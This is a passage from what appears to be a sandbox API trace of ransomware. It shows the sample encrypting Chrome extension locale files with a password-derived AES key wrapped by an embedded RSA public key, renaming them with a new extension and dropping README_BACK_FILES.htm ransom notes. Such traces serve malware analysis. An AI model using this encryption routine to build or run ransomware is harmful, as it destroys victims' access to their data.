pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.393] WriteFile (in: hFile=0x5d58, lpBuffer=0x2940180*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2940180*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.394] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0249.395] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.395] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.395] CloseHandle (hObject=0x5d5c) returned 1 [0249.395] CloseHandle (hObject=0x5d58) returned 1 [0249.395] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0249.398] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0249.398] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0249.399] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0249.400] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.400] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.400] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.400] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.400] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.400] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0249.400] AreFileApisANSI () returned 1 [0249.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.401] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.401] GetFileType (hFile=0x5d54) returned 0x1 [0249.401] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.402] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.402] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.403] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.403] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.403] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.403] GetLastError () returned 0x0 [0249.403] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0249.406] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0249.406] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.407] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.407] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.408] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.410] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.410] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.410] CryptHashData (hHash=0x2938978, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.410] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.411] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.411] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.411] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f988) returned 1 [0249.411] CryptImportPublicKeyInfo (in: hCryptProv=0x293f988, dwCertEncodingType=0x1, pInfo=0x2933700*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933730*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933738*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938078) returned 1 [0249.411] CryptEncrypt (in: hKey=0x2938078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.411] CryptEncrypt (in: hKey=0x2938078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293fb20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293fb20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.412] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293fb20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293fb20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.413] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xce, lpOverlapped=0x0) returned 1 [0249.414] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.414] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.415] CloseHandle (hObject=0x5d58) returned 1 [0249.415] CloseHandle (hObject=0x5d5c) returned 1 [0249.415] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0249.418] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0249.418] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0249.419] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0249.420] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.420] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.420] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.420] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.420] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.420] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0249.421] AreFileApisANSI () returned 1 [0249.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.421] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.421] GetFileType (hFile=0x5d54) returned 0x1 [0249.421] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.422] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.422] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.423] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.423] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.423] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.423] GetLastError () returned 0x0 [0249.423] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0249.423] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0249.424] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.424] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.425] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.425] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.427] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.427] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.427] CryptHashData (hHash=0x2938978, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.427] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.427] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ffe8) returned 1 [0249.428] CryptImportPublicKeyInfo (in: hCryptProv=0x293ffe8, dwCertEncodingType=0x1, pInfo=0x2932520*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932550*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932558*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937c78) returned 1 [0249.428] CryptEncrypt (in: hKey=0x2937c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.428] CryptEncrypt (in: hKey=0x2937c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293fcb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293fcb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.428] WriteFile (in: hFile=0x5d58, lpBuffer=0x293fcb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293fcb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.429] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.431] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.431] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.432] CloseHandle (hObject=0x5d5c) returned 1 [0249.432] CloseHandle (hObject=0x5d58) returned 1 [0249.432] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0249.435] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0249.435] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0249.437] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0249.438] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.438] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.438] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.438] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.438] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.438] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 